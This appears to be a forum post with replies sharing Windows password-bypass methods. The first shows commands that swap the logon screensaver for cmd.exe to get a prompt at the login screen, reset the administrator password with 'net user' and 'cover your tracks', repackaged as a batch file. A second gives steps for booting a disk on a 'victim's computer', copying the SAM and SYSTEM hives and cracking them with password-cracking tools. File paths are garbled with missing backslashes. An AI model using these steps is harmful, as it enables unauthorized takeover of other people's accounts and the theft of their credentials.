This is a cool little computer trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
cd
cdwindowssystem32
mkdir temphack
copy logon.scr temphacklogon.scr
copy cmd.exe temphackcmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234? and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
U can make a boot disk on a floppy disk and make a bat with a txt document then rename to .bat file with the command you just wrote like eg.
@echo ***********************************
@echo * Edd-Da-Styler *
@echo * Password changing *
@echo * version 1.0 *
@echo * *
@echo * *
@echo * *
@echo ***********************************
@echo.
@echo Sit back and let dos do it all…..Enjoy
@echo.
Pause
@echo.
cd
cdwindowssystem32
mkdir temphack
copy logon.scr temphacklogon.scr
copy cmd.exe temphackcmd.exe
del logon.scr
rename cmd.exe logon.scr
@echo.
@echo The admin password is now changed…..thx ( restart your computer )
pause
exit
write back i think you mite need some adustments…
AND if posted doesnt work anymore because of latest patches and releases for XP.
1.you should have ur own cmputer at home.or at least a computer from someone who can use a cd writer.
2.use nero 7 downloadable from net
3.create bootable disk.
4.bring the disk to your victims computer.
5.boot from it.(it mounts NTFS)
6.type “c:” enter
7.type “dir” enter
8.if you see WINDOWS ok fine.but if not you have to try other drive letters and do the same process (u cn try d: or e: until yo’ll find WINDOWS).
9.if succeed type “copy c:windowssystem32configSAM c:folder” (this copy SAM & create folder in c:)
10.repeat but change “SAM” to “SYSTEM”.
11.remember use “c:” only if you seen WINDOWS in “c:” but if not use the drive letter that has.
12.get Offline Registry Editor from Pnordhal donloadable from net.
13.follow instructions.use it.it will blank your administrator password.
14.log on using administrator blank password.
15.non-domain users press ctrl+alt+del (press del twice, del only).type in.
16.have a copy of SAMInside.follow instructions using SAM file.(from internet)
17.export users to PWDump file.
17.have a copy of LOpthcrack 5
18.follow instructions.crack passwd using importing PWDump.browse file.follow instructions.that’s it.
19.You have ur administrator password.hack ur own PC.and bring back the original administrator password from users options.
20.blanking ur administrator pass disables ur access to “ENCRYPTED” files only, if u made one , but not all files.
21.if u dont want to blank ur password then do this at home.crack ur password at home.
22.some of these steps came from authors of mentioned products, except create boot disk part & changing back admin password.i discovered it myself.
23.thanks to the authors.
24.why use 4 application? you’ll know.
25.thanks to the crackers they are making hackers out of you.enjoy.
26.this is only for local computers.
27.if anyone already posted or made tutorials same with these i’m sorry i didnt know.
28.apologies.:)
Start>Run>mmc
File>Open>C:windowssystem32lusrmgr.msc
Click on “Users” Then right click “Administrator”> “Set password”
one of the best tricks dud3!!